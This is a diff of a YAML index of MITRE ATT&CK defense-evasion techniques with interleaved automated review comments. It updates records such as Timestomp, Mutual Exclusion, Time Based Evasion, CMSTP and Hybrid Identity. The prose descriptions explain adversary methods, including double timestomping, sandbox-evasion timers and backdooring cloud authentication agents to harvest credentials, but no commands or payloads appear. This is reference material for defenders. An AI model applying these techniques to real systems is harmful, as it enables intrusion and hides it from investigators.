- id: attack-pattern--47f2d673-ca62-47e9-929b-1b0be9657611
- type: attack-pattern
- created: '2020-01-31T12:42:44.103Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1070.006
- url: https://attack.mitre.org/techniques/T1070/006
- - url: http://windowsir.blogspot.com/2013/07/howto-determinedetect-use-of-anti.html
- description: 'Carvey, H. (2013, July 23). HowTo: Determine/Detect the use
- of Anti-Forensics Techniques. Retrieved June 3, 2016.'
- source_name: WindowsIR Anti-Forensic Techniques
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2024-09-30T15:14:56.021Z'
name: 'Indicator Removal on Host: Timestomp'
description: |-
- Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
+ Adversaries may modify file time attributes to hide new files or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder and blend malicious files with legitimate files.
+
+ Both the `$STANDARD_INFORMATION` (`$SI`) and `$FILE_NAME` (`$FN`) attributes record times in a Master File Table (MFT) file.(Citation: Inversecos Timestomping 2022) `$SI` (dates/time stamps) is displayed to the end user, including in the File System view, while `$FN` is dealt with by the kernel.(Citation: Magnet Forensics)
+
+ Modifying the `$SI` attribute is the most common method of timestomping because it can be modified at the user level using API calls. `$FN` timestomping, however, typically requires interacting with the system kernel or moving or renaming a file.(Citation: Inversecos Timestomping 2022)
+
+ Adversaries modify timestamps on files so that they do not appear conspicuous to forensic investigators or file analysis tools. In order to evade detections that rely on identifying discrepancies between the `$SI` and `$FN` attributes, adversaries may also engage in “double timestomping” by modifying times on both attributes simultaneously.(Citation: Double Timestomping)
Timestomping may be used along with file name [Masquerading](https://attack.mitre.org/techniques/T1036) to hide malware and tools.(Citation: WindowsIR Anti-Forensic Techniques)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
+ x_mitre_contributors:
+ - Romain Dumont, ESET
+ - Mike Hartley @mikehartley10
+ x_mitre_deprecated: false
x_mitre_detection: 'Forensic techniques exist to detect aspects of files that
have had their timestamps modified. (Citation: WindowsIR Anti-Forensic Techniques)
It may be possible to detect timestomping using file modification monitoring
that collects information on file handle opens and can compare timestamp values.'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
+ - 'Process: OS API Execution'
- 'File: File Modification'
- 'File: File Metadata'
+ - 'Command: Command Execution'
x_mitre_defense_bypassed:
- Host forensic analysis
- x_mitre_permissions_required:
- - root
- - SYSTEM
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--47f2d673-ca62-47e9-929b-1b0be9657611
+ created: '2020-01-31T12:42:44.103Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1070/006
+ external_id: T1070.006
+ - source_name: WindowsIR Anti-Forensic Techniques
+ description: 'Carvey, H. (2013, July 23). HowTo: Determine/Detect the use
+ of Anti-Forensics Techniques. Retrieved June 3, 2016.'
+ url: http://windowsir.blogspot.com/2013/07/howto-determinedetect-use-of-anti.html
+ - source_name: Inversecos Timestomping 2022
+ description: 'Lina Lau. (2022, April 28). Defence Evasion Technique: Timestomping
+ Detection – NTFS Forensics. Retrieved September 30, 2024.'
+ url: https://www.inversecos.com/2022/04/defence-evasion-technique-timestomping.html
+ - source_name: Magnet Forensics
+ description: Magnet Forensics. (2020, August 24). Expose Evidence of Timestomping
+ with the NTFS Timestamp Mismatch Artifact. Retrieved June 20, 2024.
+ url: https://www.magnetforensics.com/blog/expose-evidence-of-timestomping-with-the-ntfs-timestamp-mismatch-artifact-in-magnet-axiom-4-4/
+ - source_name: Double Timestomping
+ description: Matthew Dunwoody. (2022, April 28). I have seen double-timestomping
+ ITW, including by APT29. Stay sharp out there.. Retrieved June 20, 2024.
+ url: https://x.com/matthewdunwoody/status/1519846657646604289
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1070.006
atomic_tests:
- name: Set a file's access timestamp
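Review bot: in the new Timestomp description the closing sentence (`Timestomping may be used along with file name [Masquerading]...`) follows the double-timestomping paragraph with no blank line, while the four paragraphs above it are separated by blank lines, so it renders as the tail of the `$SI`/`$FN` paragraph rather than as its own point. Add the separator if the upstream text has one. Also, `x_mitre_permissions_required` (root, SYSTEM, User) is dropped without a replacement field; if that mirrors upstream deprecation of the field, a changelog line would help, since consumers of this index may still key on it.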
@@ -5364,9 +5449,76 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1620
atomic_tests: []
+ T1480.002:
+ technique:
+ modified: '2024-10-28T16:22:25.431Z'
+ name: Mutual Exclusion
+ description: |-
+ Adversaries may constrain execution or actions based on the presence of a mutex associated with malware. A mutex is a locking mechanism used to synchronize access to a resource. Only one thread or process can acquire a mutex at a given time.(Citation: Microsoft Mutexes)
+
+ While local mutexes only exist within a given process, allowing multiple threads to synchronize access to a resource, system mutexes can be used to synchronize the activities of multiple processes.(Citation: Microsoft Mutexes) By creating a unique system mutex associated with a particular malware, adversaries can verify whether or not a system has already been compromised.(Citation: Sans Mutexes 2012)
+
+ In Linux environments, malware may instead attempt to acquire a lock on a mutex file. If the malware is able to acquire the lock, it continues to execute; if it fails, it exits to avoid creating a second instance of itself.(Citation: Intezer RedXOR 2021)(Citation: Deep Instinct BPFDoor 2023)
+
+ Mutex names may be hard-coded or dynamically generated using a predictable algorithm.(Citation: ICS Mutexes 2015)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Manikantan Srinivasan, NEC Corporation India
+ - Pooja Natarajan, NEC Corporation India
+ - Nagahama Hiroki – NEC Corporation Japan
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ - Linux
+ - macOS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Process: OS API Execution'
+ - 'File: File Creation'
+ type: attack-pattern
+ id: attack-pattern--49fca0d2-685d-41eb-8bd4-05451cc3a742
+ created: '2024-09-19T14:00:03.401Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1480/002
+ external_id: T1480.002
+ - source_name: Intezer RedXOR 2021
+ description: Joakim Kennedy and Avigayil Mechtinger. (2021, March 10). New
+ Linux Backdoor RedXOR Likely Operated by Chinese Nation-State Actor. Retrieved
+ September 19, 2024.
+ url: https://intezer.com/blog/malware-analysis/new-linux-backdoor-redxor-likely-operated-by-chinese-nation-state-actor/
+ - source_name: Sans Mutexes 2012
+ description: Lenny Zeltser. (2012, July 24). Looking at Mutex Objects for
+ Malware Discovery & Indicators of Compromise. Retrieved September 19, 2024.
+ url: https://www.sans.org/blog/looking-at-mutex-objects-for-malware-discovery-indicators-of-compromise/
+ - source_name: ICS Mutexes 2015
+ description: Lenny Zeltser. (2015, March 9). How Malware Generates Mutex Names
+ to Evade Detection. Retrieved September 19, 2024.
+ url: https://isc.sans.edu/diary/How+Malware+Generates+Mutex+Names+to+Evade+Detection/19429/
+ - source_name: Microsoft Mutexes
+ description: Microsoft. (2022, March 11). Mutexes. Retrieved September 19,
+ 2024.
+ url: https://learn.microsoft.com/en-us/dotnet/standard/threading/mutexes
+ - source_name: Deep Instinct BPFDoor 2023
+ description: Shaul Vilkomir-Preisman and Eliran Nissan. (2023, May 10). BPFDoor
+ Malware Evolves – Stealthy Sniffing Backdoor Ups Its Game. Retrieved September
+ 19, 2024.
+ url: https://www.deepinstinct.com/blog/bpfdoor-malware-evolves-stealthy-sniffing-backdoor-ups-its-game
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1564.011:
technique:
modified: '2023-11-06T20:14:51.609Z'
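Review bot: the new T1480.002 (Mutual Exclusion) entry has an empty `x_mitre_detection: ''` and, unlike T1620 immediately above, no `identifier: T1480.002` key before `atomic_tests: []`. Add the identifier for consistency with the rest of the file; for detection, the upstream object may genuinely be blank, but the listed data sources (`Process: OS API Execution`, `File: File Creation`) already point at what to monitor, so an empty string here looks like a lost field rather than a deliberate one. The third contributor also uses an en dash (`Nagahama Hiroki – NEC Corporation Japan`) where the two above use `, `.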
@@ -5430,57 +5582,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1497.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Jorge Orchilles, SCYTHE
- - Ruben Dodge, @shotgunner101
- - Jeff Felling, Red Canary
- - Deloitte Threat Library Team
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
- type: attack-pattern
- created: '2020-03-06T21:11:11.225Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1497.003
- url: https://attack.mitre.org/techniques/T1497/003
- - source_name: Deloitte Environment Awareness
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
- description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- - source_name: Revil Independence Day
- url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
- description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
- supply chain exploit to attack hundreds of businesses. Retrieved September
- 30, 2021.'
- - source_name: Netskope Nitol
- url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
- description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
- with evasive sandbox analysis technique. Retrieved September 30, 2021.
- - source_name: Joe Sec Nymaim
- url: https://www.joesecurity.org/blog/3660886847485093803
- description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
- API hammering. Retrieved September 30, 2021.
- - source_name: Joe Sec Trickbot
- url: https://www.joesecurity.org/blog/498839998833561473
- description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
- Retrieved September 30, 2021.
- - source_name: ISACA Malware Tricks
- url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
- description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
- Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-09-12T15:50:18.048Z'
name: Time Based Evasion
description: |-
Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include enumerating time-based properties, such as uptime or the system clock, as well as the use of timers or other triggers to avoid a virtual machine environment (VME) or sandbox, specifically those that are automated or only operate for a limited amount of time.
@@ -5495,6 +5600,12 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Jorge Orchilles, SCYTHE
+ - Ruben Dodge, @shotgunner101
+ - Jeff Felling, Red Canary
+ - Deloitte Threat Library Team
+ x_mitre_deprecated: false
x_mitre_detection: 'Time-based evasion will likely occur in the first steps
of an operation but may also occur throughout as an adversary learns the environment.
Data and events should not be viewed in isolation, but as part of a chain
@@ -5504,9 +5615,14 @@ defense-evasion:
implementation and monitoring required. Monitoring for suspicious processes
being spawned that gather a variety of system information or perform other
forms of Discovery, especially in a short period of time, may aid in detection. '
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: OS API Execution'
- 'Process: Process Creation'
@@ -5516,8 +5632,44 @@ defense-evasion:
- Signature-based detection
- Static File Analysis
- Anti-virus
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
+ created: '2020-03-06T21:11:11.225Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1497/003
+ external_id: T1497.003
+ - source_name: Joe Sec Nymaim
+ description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
+ API hammering. Retrieved September 30, 2021.
+ url: https://www.joesecurity.org/blog/3660886847485093803
+ - source_name: Joe Sec Trickbot
+ description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
+ Retrieved September 30, 2021.
+ url: https://www.joesecurity.org/blog/498839998833561473
+ - source_name: ISACA Malware Tricks
+ description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
+ Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
+ url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
+ - source_name: Revil Independence Day
+ description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
+ supply chain exploit to attack hundreds of businesses. Retrieved September
+ 30, 2021.'
+ url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
+ - source_name: Netskope Nitol
+ description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
+ with evasive sandbox analysis technique. Retrieved September 30, 2021.
+ url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
+ - source_name: Deloitte Environment Awareness
+ description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1497.003
atomic_tests:
- name: Delay execution with ping
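Review bot: the `Deloitte Environment Awareness` URL gains an `/edit` suffix (`https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit`) together with the new retrieval date of September 13, 2024. Check that this form of the link still resolves for an unauthenticated reader; if it only works for an account with edit access, keep the original path. The rest of the hunk is the same key reorder as T1202 and T1070.006 (`revoked: false`, `type`/`id`/`created` moved below the data sources), which would again be avoided by a fixed key order in the generator.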
@@ -5546,7 +5698,7 @@ defense-evasion:
name: sh
T1218.003:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T19:35:43.077Z'
name: 'Signed Binary Proxy Execution: CMSTP'
description: |-
Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. (Citation: Microsoft Connection Manager Oct 2009) CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections.
@@ -5592,8 +5744,8 @@ defense-evasion:
external_id: T1218.003
- source_name: Twitter CMSTP Usage Jan 2018
description: Carr, N. (2018, January 31). Here is some early bad cmstp.exe...
- Retrieved April 11, 2018.
- url: https://twitter.com/ItsReallyNick/status/958789644165894146
+ Retrieved September 12, 2024.
+ url: https://x.com/ItsReallyNick/status/958789644165894146
- source_name: Microsoft Connection Manager Oct 2009
description: Microsoft. (2009, October 8). How Connection Manager Works. Retrieved
April 11, 2018.
@@ -5612,13 +5764,12 @@ defense-evasion:
url: http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/
- source_name: Twitter CMSTP Jan 2018
description: Tyrer, N. (2018, January 30). CMSTP.exe - remote .sct execution
- applocker bypass. Retrieved April 11, 2018.
- url: https://twitter.com/NickTyrer/status/958450014111633408
+ applocker bypass. Retrieved September 12, 2024.
+ url: https://x.com/NickTyrer/status/958450014111633408
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1218.003
atomic_tests: []
T1562.002:
@@ -5733,7 +5884,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562.002
atomic_tests: []
T1218.002:
@@ -5774,7 +5924,7 @@ defense-evasion:
url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T19:01:55.821Z'
name: 'Signed Binary Proxy Execution: Control Panel'
description: |-
Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel process binary (control.exe) handles execution of Control Panel items, which are utilities that allow users to view and adjust computer settings.
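Review bot: the `modified` timestamp for T1218.002 moves backwards, from 2022-05-11T14:00:00.188Z to 2022-03-11T19:01:55.821Z. The old values removed across this diff share the same .188Z millisecond suffix (2022-05-24T14:00:00.188Z, 2021-04-29T14:49:39.188Z, 2023-05-09T14:00:00.188Z), which suggests they were bulk-assigned rather than taken from upstream; if the new values are the upstream STIX `modified` fields this is a correction, but stating that in the commit message would stop a reader treating the backwards jump as an error.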
@@ -5813,8 +5963,6 @@ defense-evasion:
- User
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1218.002
atomic_tests: []
T1599.001:
@@ -5837,7 +5985,7 @@ defense-evasion:
url: https://tools.ietf.org/html/rfc1918
description: IETF Network Working Group. (1996, February). Address Allocation
for Private Internets. Retrieved October 20, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-21T01:45:58.951Z'
name: Network Address Translation Traversal
description: "Adversaries may bridge network boundaries by modifying a network
device’s Network Address Translation (NAT) configuration. Malicious modifications
@@ -5876,12 +6024,10 @@ defense-evasion:
- 'Network Traffic: Network Traffic Content'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1550:
technique:
- modified: '2024-04-12T21:18:23.798Z'
+ modified: '2024-10-15T16:09:19.001Z'
name: Use Alternate Authentication Material
description: "Adversaries may use alternate authentication material, such as
password hashes, Kerberos tickets, and application access tokens, in order
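Review bot: `x_mitre_attack_spec_version: 2.1.0` is removed from T1599.001 together with `spec_version` and nothing replaces it in this hunk, whereas T1218.003 and other techniques in this diff are bumped to 3.2.0 instead; check that the key is still emitted elsewhere in the T1599.001 object, otherwise the generated entry now lacks a spec version entirely. The T1218.002 hunk above shows the same removal without a replacement.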
@@ -5908,6 +6054,7 @@ defense-evasion:
phase_name: lateral-movement
x_mitre_contributors:
- Blake Strom, Microsoft Threat Intelligence
+ - Pawel Partyka, Microsoft Threat Intelligence
x_mitre_deprecated: false
x_mitre_detection: 'Configure robust, consistent account activity audit policies
across the enterprise and with externally accessible services.(Citation: TechNet
@@ -5925,12 +6072,12 @@ defense-evasion:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Office 365
- SaaS
- - Google Workspace
- IaaS
- Containers
- x_mitre_version: '1.3'
+ - Identity Provider
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Logon Session: Logon Session Creation'
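Review bot: T1550 drops the Office 365 and Google Workspace platforms in favour of Identity Provider and Office Suite and bumps x_mitre_version from 1.3 to 1.4; the same consolidation is applied to T1556.007, T1078.001, T1548 and T1548.005 further down. Any index or filter that selects techniques by the old platform strings will silently stop matching these techniques, so the per-platform outputs should be regenerated in the same change and diffed for techniques that disappeared rather than moved.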
@@ -5956,18 +6103,17 @@ defense-evasion:
description: NIST. (n.d.). Authentication. Retrieved January 30, 2020.
url: https://csrc.nist.gov/glossary/term/authentication
- source_name: NIST MFA
- description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved January
- 30, 2020.
- url: https://csrc.nist.gov/glossary/term/Multi_Factor-Authentication
+ description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved September
+ 25, 2024.
+ url: https://csrc.nist.gov/glossary/term/multi_factor_authentication
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1562.004:
technique:
- modified: '2024-03-28T00:01:08.337Z'
+ modified: '2024-09-12T19:37:57.867Z'
name: 'Impair Defenses: Disable or Modify System Firewall'
description: |-
Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage. Changes could be disabling the entire mechanism as well as adding, deleting, or modifying particular rules. This can be done numerous ways depending on the operating system, including via command-line, editing Windows Registry keys, and Windows Control Panel.
@@ -6012,13 +6158,12 @@ defense-evasion:
url: https://www.huntress.com/blog/blackcat-ransomware-affiliate-ttps
- source_name: change_rdp_port_conti
description: 'The DFIR Report. (2022, March 1). "Change RDP port" #ContiLeaks.
- Retrieved March 1, 2022.'
- url: https://twitter.com/TheDFIRReport/status/1498657772254240768
+ Retrieved September 12, 2024.'
+ url: https://x.com/TheDFIRReport/status/1498657772254240768
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562.004
atomic_tests: []
T1553.003:
@@ -6090,7 +6235,7 @@ defense-evasion:
* **Note:** The above hijacks are also possible without modifying the Registry via [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).
Hijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation. (Citation: SpectorOps Subverting Trust Sept 2017)
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-05T04:58:58.214Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Subvert Trust Controls: SIP and Trust Provider Hijacking'
x_mitre_detection: |-
@@ -6123,35 +6268,34 @@ defense-evasion:
- Application Control
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1553.003
atomic_tests: []
T1556.007:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Hybrid Identity
description: "Adversaries may patch, modify, or otherwise backdoor cloud authentication
processes that are tied to on-premises user identities in order to bypass
typical authentication mechanisms, access credentials, and enable persistent
access to accounts. \n\nMany organizations maintain hybrid user and device
identities that are shared between on-premises and cloud-based environments.
- These can be maintained in a number of ways. For example, Azure AD includes
- three options for synchronizing identities between Active Directory and Azure
- AD(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
+ These can be maintained in a number of ways. For example, Microsoft Entra
+ ID includes three options for synchronizing identities between Active Directory
+ and Entra ID(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
(PHS), in which a privileged on-premises account synchronizes user password
- hashes between Active Directory and Azure AD, allowing authentication to Azure
- AD to take place entirely in the cloud \n* Pass Through Authentication (PTA),
- in which Azure AD authentication attempts are forwarded to an on-premises
+ hashes between Active Directory and Entra ID, allowing authentication to Entra
+ ID to take place entirely in the cloud \n* Pass Through Authentication (PTA),
+ in which Entra ID authentication attempts are forwarded to an on-premises
PTA agent, which validates the credentials against Active Directory \n* Active
Directory Federation Services (AD FS), in which a trust relationship is established
- between Active Directory and Azure AD \n\nAD FS can also be used with other
+ between Active Directory and Entra ID \n\nAD FS can also be used with other
SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication
process to AD FS and receive a token containing the hybrid users’ identity
and privileges. \n\nBy modifying authentication processes tied to hybrid identities,
an adversary may be able to establish persistent privileged access to cloud
resources. For example, adversaries who compromise an on-premises server running
a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService`
- process that authorizes all attempts to authenticate to Azure AD, as well
+ process that authorizes all attempts to authenticate to Entra ID, as well
as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation:
AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary
may edit the `Microsoft.IdentityServer.Servicehost` configuration file to
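Review bot: the Azure AD to Entra ID rename in the T1556.007 description leaves the backticked `AzureADConnectAuthenticationAgentService` process name and the `(Citation: Azure AD Hybrid Identity)` and `(Citation: Azure AD Connect for Read Teamers)` keys untouched, which is correct because the former is the real service name and the latter must match the `source_name` entries in external_references; if the rename was scripted, confirm it was scoped to prose so no citation key or identifier was altered elsewhere in the file, since a mismatched key would break citation resolution without any YAML error.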
@@ -6159,9 +6303,9 @@ defense-evasion:
any set of claims, thereby bypassing multi-factor authentication and defined
AD FS policies.(Citation: MagicWeb)\n\nIn some cases, adversaries may be able
to modify the hybrid identity authentication process from the cloud. For example,
- adversaries who compromise a Global Administrator account in an Azure AD tenant
+ adversaries who compromise a Global Administrator account in an Entra ID tenant
may be able to register a new PTA agent via the web console, similarly allowing
- them to harvest credentials and log into the Azure AD environment as any user.(Citation:
+ them to harvest credentials and log into the Entra ID environment as any user.(Citation:
Mandiant Azure AD Backdoors)"
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -6170,21 +6314,22 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- SaaS
- - Google Workspace
- - Office 365
- IaaS
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Praetorian
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Modification'
- 'Module: Module Load'
@@ -6224,9 +6369,6 @@ defense-evasion:
url: https://www.mandiant.com/resources/detecting-microsoft-365-azure-active-directory-backdoors
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1218.015:
technique:
@@ -6289,7 +6431,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1562.012:
technique:
@@ -6349,7 +6490,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562.012
atomic_tests: []
T1207:
@@ -6390,7 +6530,7 @@ defense-evasion:
description: Lucand,G. (2018, February 18). Detect DCShadow, impossible?.
Retrieved March 30, 2018.
source_name: ADDSecurity DCShadow Feb 2018
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-08T21:20:04.850Z'
name: Rogue Domain Controller
description: |-
